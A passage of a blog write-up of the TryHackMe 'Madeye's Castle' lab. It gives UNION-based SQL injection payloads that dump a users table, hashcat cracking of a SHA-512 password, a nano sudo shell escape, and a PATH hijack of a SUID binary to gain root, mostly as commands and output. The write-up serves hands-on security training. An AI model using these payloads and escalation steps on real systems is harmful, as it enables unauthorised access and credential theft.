<p>then we found login form</p>
<h2 id="exploit">Exploit</h2>
<p>First i’m try to using sql map doesn’t working but there give us some hint.</p>
<h3 id="sql-injection">SQL Injection</h3>
<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/thm-madeye-castle/sql.png" alt="Background" /></p>

<p>lets check manually and to make it easier we can use burp suite like this :</p>

<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/thm-madeye-castle/bg_5.png" alt="Background" /></p>

<p>then send it to repeater</p>

<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/thm-madeye-castle/bg_6.png" alt="Background" /></p>

<p>in sqlmap give the hint that is UNION injectable with 4 colloums, now put command sql injection to username :</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>razor' UNION ALL SELECT NULL,NULL,NULL,NULL--
</pre></td></tr></tbody></table></code></div></div>
<p>and here the result : 
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/thm-madeye-castle/sql_2.png" alt="Background" /></p>

<p>here I am trying to send null values to 4 columns and get an error, so there are 4 columns where column 1 and 4 are injectable username and password. we can identify the column for the user and password in 1 and 4. The result :</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>razor' UNION ALL SELECT 1,2,3,4--
</pre></td></tr></tbody></table></code></div></div>
<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/thm-madeye-castle/sql_1.png" alt="Background" /></p>

<p>After that we can check the version in column 1 or 4 or both. if you don’t know that you can read in <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#dbms-identification">here</a> and command for sqlite in <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md">here</a> . then using this command :</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>razor'UNION ALL SELECT sqlite_version(),2,3,sqlite_version()--
</pre></td></tr></tbody></table></code></div></div>
<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/thm-madeye-castle/sql_3.png" alt="Background" /></p>

<p>then lets find table name : <code class="language-plaintext highlighter-rouge">users</code>, to find that you need this command :</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>razor' UNION ALL SELECT sql,2,3,4 FROM sqlite_master WHERE tbl_name= 'users' AND type = 'table'--
</pre></td></tr></tbody></table></code></div></div>
<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/thm-madeye-castle/sql_4.png" alt="Background" /></p>

<p>Now we find the contents of all the column including username, password, admin, and notes . but the problem is we can only see 1 username and 1 password, and I tried selecting everything from table using * and the result was an error</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>razor' UNION ALL SELECT name,2,3,password FROM users--
</pre></td></tr></tbody></table></code></div></div>
<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/thm-madeye-castle/sql_5.png" alt="Background" /></p>

<p>but if we check the columns of table we have 40 colomns which is there are a lot of user and password</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>razor'UNION ALL SELECT COUNT(name),2,3,COUNT(password) FROM users--
</pre></td></tr></tbody></table></code></div></div>
<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/thm-madeye-castle/sql_6.png" alt="Background" /></p>

<p>now after i’m searching and I found this article <a href="https://sqlite.org/lang_aggfunc.html">here</a> which helps me to extract the contents from the table column. in that site we can use group_concat() to see all of table :</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>razor'UNION ALL SELECT group_concat(name),2,3,COUNT(password) FROM users--
</pre></td></tr></tbody></table></code></div></div>
<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/thm-madeye-castle/sql_7.png" alt="Background" /></p>

<p>And for The notes :</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>razor'UNION ALL SELECT group_concat(notes),2,3,COUNT(password) FROM users--
</pre></td></tr></tbody></table></code></div></div>
<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/thm-madeye-castle/sql_8.png" alt="Background" /></p>

<p>now when we align the name and notes it will look like this :</p>

<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/thm-madeye-castle/sql_9.png" alt="Background" /></p>

<p>from the picture we can conclude that user harry uses a password with best64</p>

<h2 id="cracking-hash">Cracking Hash</h2>

<ul>
  <li>first we have file <code class="language-plaintext highlighter-rouge">spellnames.txt</code></li>
  <li>then we have a hint that the password used is best64 where we can use the best64 hashcat rule
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>hashcat -D 2 --stdout -r /usr/share/hashcat/rules/best64.rule spellnames.txt new_crackabel
</pre></td></tr></tbody></table></code></div>    </div>
  </li>
  <li>Indentify type of hash
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td><td class="rouge-code"><pre>hash-identifier b326e7a664d756c39c9e09a98438b08226f98b89188ad144dd655f140674b5eb3fdac0f19bb3903be1f52c40c252c0e7ea7f5050dec63cf3c85290c0a2c5c885
--------------------------------------------------
Possible Hashs:
[+] SHA-512
[+] Whirlpool
Least Possible Hashs:
[+] SHA-512(HMAC)
[+] Whirlpool(HMAC)
--------------------------------------------------
</pre></td></tr></tbody></table></code></div>    </div>
  </li>
</ul>

<p>Now we just crack the password</p>

<div class="language-bat highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
</pre></td><td class="rouge-code"><pre>$ <span class="kd">hashcat</span> <span class="na">-D </span><span class="m">2</span> <span class="na">-m </span><span class="m">1700</span> <span class="s1">'b326e7a664d756c39c9e09a98438b08226f98b89188ad144dd655f140674b5eb3fdac0f19bb3903be1f52c40c252c0e7ea7f5050dec63cf3c85290c0a2c5c885'</span> <span class="kd">new_crackabel</span>
<span class="kd">hashcat</span> <span class="o">(</span><span class="kd">v6</span>.1.1<span class="o">)</span> <span class="kd">starting</span>...

<span class="o">*</span> <span class="kd">Device</span> #1: <span class="kd">WARNING</span><span class="err">!</span> <span class="kd">Kernel</span> <span class="kd">exec</span> <span class="nb">timeout</span> <span class="kd">is</span> <span class="ow">not</span> <span class="kd">disabled</span>.
             <span class="kd">This</span> <span class="kd">may</span> <span class="kd">cause</span> <span class="s2">"CL_OUT_OF_RESOURCES"</span> <span class="kd">or</span> <span class="kd">related</span> <span class="kd">errors</span>.
             <span class="kd">To</span> <span class="na">disable</span> <span class="kd">the</span> <span class="nb">timeout</span><span class="o">,</span> <span class="kd">see</span>: <span class="kd">https</span>://hashcat.net/q/timeoutpatch
<span class="o">*</span> <span class="kd">Device</span> #2: <span class="kd">WARNING</span><span class="err">!</span> <span class="kd">Kernel</span> <span class="kd">exec</span> <span class="nb">timeout</span> <span class="kd">is</span> <span class="ow">not</span> <span class="kd">disabled</span>.
             <span class="kd">This</span> <span class="kd">may</span> <span class="kd">cause</span> <span class="s2">"CL_OUT_OF_RESOURCES"</span> <span class="kd">or</span> <span class="kd">related</span> <span class="kd">errors</span>.
             <span class="kd">To</span> <span class="na">disable</span> <span class="kd">the</span> <span class="nb">timeout</span><span class="o">,</span> <span class="kd">see</span>: <span class="kd">https</span>://hashcat.net/q/timeoutpatch
<span class="kd">CUDA</span> <span class="kd">API</span> <span class="o">(</span><span class="kd">CUDA</span> <span class="m">11</span>.2<span class="o">)</span>
<span class="o">====================</span>
<span class="o">*</span> <span class="kd">Device</span> #1: <span class="kd">GeForce</span> <span class="kd">GTX</span> <span class="m">950</span><span class="o">,</span> <span class="m">1501</span>/2001 <span class="kd">MB</span><span class="o">,</span> <span class="m">6</span><span class="kd">MCU</span>

<span class="kd">OpenCL</span> <span class="kd">API</span> <span class="o">(</span><span class="kd">OpenCL</span> <span class="m">1</span>.2 <span class="kd">CUDA</span> <span class="m">11</span>.2.136<span class="o">)</span> <span class="o">-</span> <span class="kd">Platform</span> #1 <span class="o">[</span><span class="kd">NVIDIA</span> <span class="kd">Corporation</span><span class="o">]</span>
<span class="o">========================================================================</span>
<span class="o">*</span> <span class="kd">Device</span> #2: <span class="kd">GeForce</span> <span class="kd">GTX</span> <span class="m">950</span><span class="o">,</span> <span class="kd">skipped</span>

<span class="kd">OpenCL</span> <span class="kd">API</span> <span class="o">(</span><span class="kd">OpenCL</span> <span class="m">1</span>.2 <span class="kd">pocl</span> <span class="m">1</span>.6<span class="o">,</span> <span class="kd">None</span><span class="na">+Asserts</span><span class="o">,</span> <span class="kd">LLVM</span> <span class="m">9</span>.0.1<span class="o">,</span> <span class="kd">RELOC</span><span class="o">,</span> <span class="kd">SLEEF</span><span class="o">,</span> <span class="kd">DISTRO</span><span class="o">,</span> <span class="kd">POCL_DEBUG</span><span class="o">)</span> <span class="o">-</span> <span class="kd">Platform</span> #2 <span class="o">[</span><span class="kd">The</span> <span class="kd">pocl</span> <span class="kd">project</span><span class="o">]</span>
<span class="o">=============================================================================================================================</span>
<span class="o">*</span> <span class="kd">Device</span> #3: <span class="kd">pthread</span><span class="na">-Intel</span><span class="o">(</span><span class="kd">R</span><span class="o">)</span> <span class="kd">Pentium</span><span class="o">(</span><span class="kd">R</span><span class="o">)</span> <span class="kd">Gold</span> <span class="kd">G5400</span> <span class="kd">CPU</span> @ <span class="m">3</span>.70GHz<span class="o">,</span> <span class="kd">skipped</span>

<span class="kd">Minimum</span> <span class="kd">password</span> <span class="kd">length</span> <span class="kd">supported</span> <span class="kd">by</span> <span class="kd">kernel</span>: <span class="m">0</span>
<span class="kd">Maximum</span> <span class="kd">password</span> <span class="kd">length</span> <span class="kd">supported</span> <span class="kd">by</span> <span class="kd">kernel</span>: <span class="m">256</span>

<span class="kd">INFO</span>: <span class="kd">All</span> <span class="kd">hashes</span> <span class="kd">found</span> <span class="k">in</span> <span class="kd">potfile</span><span class="err">!</span> <span class="kd">Use</span> <span class="na">--show </span><span class="kd">to</span> <span class="kd">display</span> <span class="kd">them</span>.

<span class="kd">Started</span>: <span class="kd">Wed</span> <span class="kd">Feb</span> <span class="m">10</span> <span class="m">22</span>:48:58 <span class="m">2021</span>
<span class="kd">Stopped</span>: <span class="kd">Wed</span> <span class="kd">Feb</span> <span class="m">10</span> <span class="m">22</span>:48:59 <span class="m">2021</span>

$ <span class="kd">hashcat</span> <span class="na">-D </span><span class="m">2</span> <span class="na">-m </span><span class="m">1700</span> <span class="s1">'b326e7a664d756c39c9e09a98438b08226f98b89188ad144dd655f140674b5eb3fdac0f19bb3903be1f52c40c252c0e7ea7f5050dec63cf3c85290c0a2c5c885'</span> <span class="kd">new_crackabel</span> <span class="na">--show
</span><span class="kd">b326e7a664d756c39c9e09a98438b08226f98b89188ad144dd655f140674b5eb3fdac0f19bb3903be1f52c40c252c0e7ea7f5050dec63cf3c85290c0a2c5c885</span><span class="nl">:wingardiumleviosa</span><span class="m">123</span>

</pre></td></tr></tbody></table></code></div></div>
<h2 id="user-escalation">User escalation</h2>

<h3 id="user1">User1</h3>

<p>Now we have first user, now lets jump in to ssh :</p>
<div class="language-bat highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td><td class="rouge-code"><pre><span class="kd">ssh</span> <span class="kd">harry</span>@10.10.185.66

<span class="kd">harry</span>@hogwartz<span class="na">-castle</span>:<span class="o">~</span>$ <span class="kd">id</span>
<span class="kd">uid</span><span class="o">=</span><span class="m">1001</span><span class="o">(</span><span class="kd">harry</span><span class="o">)</span> <span class="kd">gid</span><span class="o">=</span><span class="m">1001</span><span class="o">(</span><span class="kd">harry</span><span class="o">)</span> <span class="kd">groups</span><span class="o">=</span><span class="m">1001</span><span class="o">(</span><span class="kd">harry</span><span class="o">)</span>
<span class="kd">harry</span>@hogwartz<span class="na">-castle</span>:<span class="o">~</span>$ <span class="kd">ls</span>
<span class="kd">user1</span>.txt
<span class="kd">harry</span>@hogwartz<span class="na">-castle</span>:<span class="o">~</span>$ <span class="kd">cat</span> <span class="kd">user1</span>.txt 
<span class="kd">RME</span><span class="o">{</span><span class="kd">t</span><span class="o">--------------------------------</span><span class="na">--c</span><span class="o">}</span>
<span class="kd">harry</span>@hogwartz<span class="na">-castle</span>:<span class="o">~</span>$ 
</pre></td></tr></tbody></table></code></div></div>
<h3 id="user2">User2</h3>

<p>now lets check privilage of harry</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre>harry@hogwartz-castle:~$ sudo -l
[sudo] password for harry: 
Matching Defaults entries for harry on hogwartz-castle:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User harry may run the following commands on hogwartz-castle:
    (hermonine) /usr/bin/pico
    (hermonine) /usr/bin/pico
harry@hogwartz-castle:~$ 
</pre></td></tr></tbody></table></code></div></div>
<p>Then check /usr/bin/pico and its a nano, now we can exploit it to user hermonine and use gtfobins <a href="https://gtfobins.github.io/gtfobins/nano/#sudo">here</a></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>sudo -u hermonine /usr/bin/pico
^R^X
reset; sh 1&gt;&amp;0 2&gt;&amp;0
</pre></td></tr></tbody></table></code></div></div>
<p>here the shell condition is not good but it doesn’t matter and we can still use it</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td><td class="rouge-code"><pre>$ cd
sh: 6: cd: can't cd to /home/harry
$ bash -i               
bash: /home/harry/.bashrc: Permission denied
hermonine@hogwartz-castle:~$ export TERM=xterm
hermonine@hogwartz-castle:~$ cd /home/hermonine/
hermonine@hogwartz-castle:/home/hermonine$ ls
user2.txt
hermonine@hogwartz-castle:/home/hermonine$ cat user2.txt 
RME{p--------------------------------------6}
hermonine@hogwartz-castle:/home/hermonine$ id
uid=1002(hermonine) gid=1002(hermonine) groups=1002(hermonine)
hermonine@hogwartz-castle:/home/hermonine$
</pre></td></tr></tbody></table></code></div></div>
<h3 id="exploit-root">Exploit Root</h3>

<p>Lets check SUID permission with this command :</p>
<div class="language-bat highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
</pre></td><td class="rouge-code"><pre><span class="kd">hermonine</span>@hogwartz<span class="na">-castle</span>:/home/hermonine$ <span class="nb">find</span> / <span class="na">-perm -u</span><span class="o">=</span><span class="kd">s</span> <span class="na">-type </span><span class="kd">f</span> <span class="m">2</span><span class="o">&gt;</span><span class="na">/dev/null
/srv/time-turner/swagger
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newuidmap
/usr/bin/traceroute</span><span class="m">6</span>.iputils
<span class="na">/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/lib/x</span><span class="m">86</span>_64<span class="na">-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit</span><span class="o">-</span><span class="m">1</span><span class="na">/polkit-agent-helper</span><span class="o">-</span><span class="m">1</span>
<span class="na">/usr/lib/dbus</span><span class="o">-</span><span class="m">1</span>.0/dbus<span class="na">-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/bin/umount
/bin/fusermount
/bin/su
/bin/ping
/bin/mount
</span><span class="kd">hermonine</span>@hogwartz<span class="na">-castle</span>:/home/hermonine$
</pre></td></tr></tbody></table></code></div></div>
<p>then we have found swagger access for the hermonine user,
now if you dont know how to get swagger to your machine you can read here :</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td><td class="rouge-code"><pre>first you can copy that to /tmp 
and you can use scp tools and following this 

Victim : 

hermonine@hogwartz-castle:/home/hermonine$ cp /srv/time-turner/swagger /tmp
hermonine@hogwartz-castle:/home/hermonine$ cd /tmp/
hermonine@hogwartz-castle:/tmp$ ls
swagger

Hacker (Your Machines):

$ scp harry@10.10.185.66:/tmp/swagger ./swagger 
harry@10.10.185.66's password: 
swagger                                                                          100% 8816    24.3KB/s   00:00
</pre></td></tr></tbody></table></code></div></div>

<p>then we can use ghidra for see main function of swagger, lets check in function section main :</p>

<div class="language-bat highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
</pre></td><td class="rouge-code"><pre><span class="kd">undefined8</span> <span class="kd">main</span><span class="o">(</span><span class="kd">void</span><span class="o">)</span>

<span class="o">{</span>
  <span class="kd">time_t</span> <span class="kd">tVar1</span><span class="o">;</span>
  <span class="kd">long</span> <span class="kd">in_FS_OFFSET</span><span class="o">;</span>
  <span class="kd">uint</span> <span class="kd">local_18</span><span class="o">;</span>
  <span class="kd">uint</span> <span class="kd">local_14</span><span class="o">;</span>
  <span class="kd">long</span> <span class="kd">local_10</span><span class="o">;</span>
  
  <span class="kd">local_10</span> <span class="o">=</span> <span class="o">*(</span><span class="kd">long</span> <span class="o">*)(</span><span class="kd">in_FS_OFFSET</span> <span class="o">+</span> <span class="mh">0x28</span><span class="o">);</span>
  <span class="kd">tVar1</span> <span class="o">=</span> <span class="nb">time</span><span class="o">((</span><span class="kd">time_t</span> <span class="o">*)</span><span class="mh">0x0</span><span class="o">);</span>
  <span class="kd">srand</span><span class="o">((</span><span class="kd">uint</span><span class="o">)</span><span class="kd">tVar1</span><span class="o">);</span>
  <span class="kd">local_14</span> <span class="o">=</span> <span class="kd">rand</span><span class="o">();</span>
  <span class="kd">printf</span><span class="o">(</span><span class="s2">"Guess my number: "</span><span class="o">);</span>
  __isoc99_scanf<span class="o">(&amp;</span><span class="kd">DAT_00100b8d</span><span class="o">,&amp;</span><span class="kd">local_18</span><span class="o">);</span>
  <span class="k">if</span> <span class="o">(</span><span class="kd">local_14</span> <span class="o">==</span> <span class="kd">local_18</span><span class="o">)</span> <span class="o">{</span>
    <span class="kd">impressive</span><span class="o">();</span>
  <span class="o">}</span>
  <span class="k">else</span> <span class="o">{</span>
    <span class="kd">puts</span><span class="o">(</span><span class="s2">"Nope, that is not what I was thinking"</span><span class="o">);</span>
    <span class="kd">printf</span><span class="o">(</span><span class="s2">"I was thinking of </span><span class="vm">%d</span><span class="s2">\n"</span><span class="o">,(</span><span class="kd">ulong</span><span class="o">)</span><span class="kd">local_14</span><span class="o">);</span>
  <span class="o">}</span>
  <span class="k">if</span> <span class="o">(</span><span class="kd">local_10</span> <span class="err">!</span><span class="o">=</span> <span class="o">*(</span><span class="kd">long</span> <span class="o">*)(</span><span class="kd">in_FS_OFFSET</span> <span class="o">+</span> <span class="mh">0x28</span><span class="o">))</span> <span class="o">{</span>
                    /<span class="o">*</span> <span class="kd">WARNING</span>: <span class="kd">Subroutine</span> <span class="kd">does</span> <span class="ow">not</span> <span class="kd">return</span> <span class="o">*</span>/
    __stack_chk_fail<span class="o">();</span>
  <span class="o">}</span>
  <span class="kd">return</span> <span class="m">0</span><span class="o">;</span>
<span class="o">}</span>
</pre></td></tr></tbody></table></code></div></div>
<p>Check in function section impresive :</p>
<div class="language-bat highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre></td><td class="rouge-code"><pre><span class="kd">void</span> <span class="kd">impressive</span><span class="o">(</span><span class="kd">void</span><span class="o">)</span>

<span class="o">{</span>
  <span class="kd">setregid</span><span class="o">(</span><span class="m">0</span><span class="o">,</span><span class="m">0</span><span class="o">);</span>
  <span class="kd">setreuid</span><span class="o">(</span><span class="m">0</span><span class="o">,</span><span class="m">0</span><span class="o">);</span>
  <span class="kd">puts</span><span class="o">(</span><span class="s2">"Nice use of the time-turner</span><span class="err">!</span><span class="s2">"</span><span class="o">);</span>
  <span class="kd">printf</span><span class="o">(</span><span class="s2">"This system architecture is "</span><span class="o">);</span>
  <span class="kd">fflush</span><span class="o">(</span><span class="kd">stdout</span><span class="o">);</span>
  <span class="kd">system</span><span class="o">(</span><span class="s2">"uname -p"</span><span class="o">);</span>
  <span class="kd">return</span><span class="o">;</span>
<span class="o">}</span>
</pre></td></tr></tbody></table></code></div></div>
<p>The logic of this program is that when you guess the correct number, the impresive () function will execute the uname command and,here we can execute the binary “uname -p” which is where we can manipulate path variables and can pass malicious code
resource for rand() <a href="https://man7.org/linux/man-pages/man3/rand.3.html">here</a></p>

<p><a href="https://www.programiz.com/cpp-programming/library-function/cstdlib/srand">srand()</a> : The srand() function in C++ seeds the pseudo random number generator used by the rand() function. The seed for rand() function is 1 by default. It means that if no srand() is called before rand(), the rand() function behaves as if it was seeded with srand(1) and the rand() value always generated same.</p>

<p><a href="https://www.geeksforgeeks.org/time-function-in-c/">time()</a> : The time() function is defined in time.h (ctime in C++) header file. This function returns the time since 00:00:00 UTC, January 1, 1970 (Unix timestamp) in seconds</p>

<p>lets executes a binary called uname ,  if we run swagger program with same logic we get the same value multiple time.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
</pre></td><td class="rouge-code"><pre>hermonine@hogwartz-castle:/tmp$ for i in $(seq 1 10);do echo "razor" | ./swagger ;done;
Guess my number: Nope, that is not what I was thinking
I was thinking of 1144253117
Guess my number: Nope, that is not what I was thinking
I was thinking of 1144253117
Guess my number: Nope, that is not what I was thinking
I was thinking of 1144253117
Guess my number: Nope, that is not what I was thinking
I was thinking of 1144253117
Guess my number: Nope, that is not what I was thinking
I was thinking of 1144253117
Guess my number: Nope, that is not what I was thinking
I was thinking of 1144253117
Guess my number: Nope, that is not what I was thinking
I was thinking of 1144253117
Guess my number: Nope, that is not what I was thinking
I was thinking of 1144253117
Guess my number: Nope, that is not what I was thinking
I was thinking of 1144253117
Guess my number: Nope, that is not what I was thinking
I was thinking of 1144253117
hermonine@hogwartz-castle:/tmp$
</pre></td></tr></tbody></table></code></div></div>
<p>when stopping the rand () function. The first time you need to do is take the first executable rand () value and enter the second execute value.
now lets create binary at /tmp and add /tmp to $PATH, doing this for getting root privilage using path variable</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>hermonine@hogwartz-castle:/tmp$ touch uname
hermonine@hogwartz-castle:/tmp$ echo "sudo usermod -aG sudo harry" &gt; uname
hermonine@hogwartz-castle:/tmp$ export PATH=/tmp:$PATH
hermonine@hogwartz-castle:/tmp$ chmod +x uname
</pre></td></tr></tbody></table></code></div></div>
<p>that code in will add user harry to sudo group when /srv/time-turner/swagger will be executed</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td><td class="rouge-code"><pre>hermonine@hogwartz-castle:/tmp$ /srv/time-turner/swagger|grep -Eo '[^ ]+$' |tail -1| /srv/time-turner/swagger 
whoami
Guess my number: Nice use of the time-turner!
This system architecture is hermonine@hogwartz-castle:/tmp$ su harry
Password: 
To run a command as administrator (user "root"), use "sudo &lt;command&gt;".
See "man sudo_root" for details.

harry@hogwartz-castle:/tmp$ sudo su root
[sudo] password for harry: 
root@hogwartz-castle:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@hogwartz-castle:/tmp# cat /root/root.txt 
RME{M------------------------------f}
root@hogwartz-castle:/tmp#
</pre></td></tr></tbody></table></code></div></div>
<p>Happy Hacking :D</p>


      </div>

      <div class="post-tail-wrapper text-muted">

        <!-- categories -->
        
        <div class="post-meta mb-3">
          <i class="far fa-folder-open fa-fw mr-1"></i>
          
            <a href='/categories/writeup/'>Writeup</a>,
            <a href='/categories/tryhackme/'>Tryhackme</a>
        </div>
        

        <!-- tags -->
        
        <div class="post-tags">
          <i class="fa fa-tags fa-fw mr-1"></i>
          
          <a href="/tags/cracking/"
            class="post-tag no-text-decoration" >cracking</a>
          
          <a href="/tags/ghidra/"
            class="post-tag no-text-decoration" >ghidra</a>
          
          <a href="/tags/smb/"
            class="post-tag no-text-decoration" >smb</a>
          
          <a href="/tags/burpsuite/"
            class="post-tag no-text-decoration" >burpsuite</a>
          
          <a href="/tags/costom-exploitation/"
            class="post-tag no-text-decoration" >costom exploitation</a>
          
          <a href="/tags/nmap/"
            class="post-tag no-text-decoration" >nmap</a>
          
          <a href="/tags/gobuster/"
            class="post-tag no-text-decoration" >gobuster</a>
          
          <a href="/tags/sql-injection/"
            class="post-tag no-text-decoration" >sql-injection</a>
          
          <a href="/tags/hashcat/"
            class="post-tag no-text-decoration" >hashcat</a>
          
          <a href="/tags/medium-box/"
            class="post-tag no-text-decoration" >medium-box</a>
          
          <a href="/tags/sqlite/"
            class="post-tag no-text-decoration" >sqlite</a>
          
          </div>
        

        <div class="post-tail-bottom
          d-flex justify-content-between align-items-center mt-3 pt-5 pb-2">
          
          <div class="license-wrapper">
            This post is licensed under
            <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a>
            by the author.
          </div>
          

          <!--
 Post sharing snippet
-->

<div class="share-wrapper">
  <span class="share-label text-muted mr-1">Share</span>
  <span class="share-icons">
    
    

    
      
        <a href="https://twitter.com/intent/tweet?text=Tryhackme Madeye's Castle - Razor-Sec&url=/posts/writeup-tryhackme-madeye-castle/" data-toggle="tooltip" data-placement="top"
          title="Twitter" target="_blank" rel="noopener" aria-label="Twitter">
          <i class="fa-fw fab fa-twitter"></i>
        </a>
    
      
        <a href="https://www.facebook.com/sharer/sharer.php?title=Tryhackme Madeye's Castle - Razor-Sec&u=/posts/writeup-tryhackme-madeye-castle/" data-toggle="tooltip" data-placement="top"
          title="Facebook" target="_blank" rel="noopener" aria-label="Facebook">
          <i class="fa-fw fab fa-facebook-square"></i>
        </a>
    
      
        <a href="https://telegram.me/share?text=Tryhackme Madeye's Castle - Razor-Sec&url=/posts/writeup-tryhackme-madeye-castle/" data-toggle="tooltip" data-placement="top"
          title="Telegram" target="_blank" rel="noopener" aria-label="Telegram">
          <i class="fa-fw fab fa-telegram"></i>
        </a>
    

    <i class="fa-fw fas fa-link small" onclick="copyLink()"
        data-toggle="tooltip" data-placement="top" title="Copy link"></i>

  </span>
</div>


        </div><!-- .post-tail-bottom -->

      </div><!-- div.post-tail -->

    </div> <!-- .post -->


  </div> <!-- #post-wrapper -->

  

  

  <!--
  The Pannel on right side (Desktop views)
-->

<div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down">

  <div class="access">

  














  

  















  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
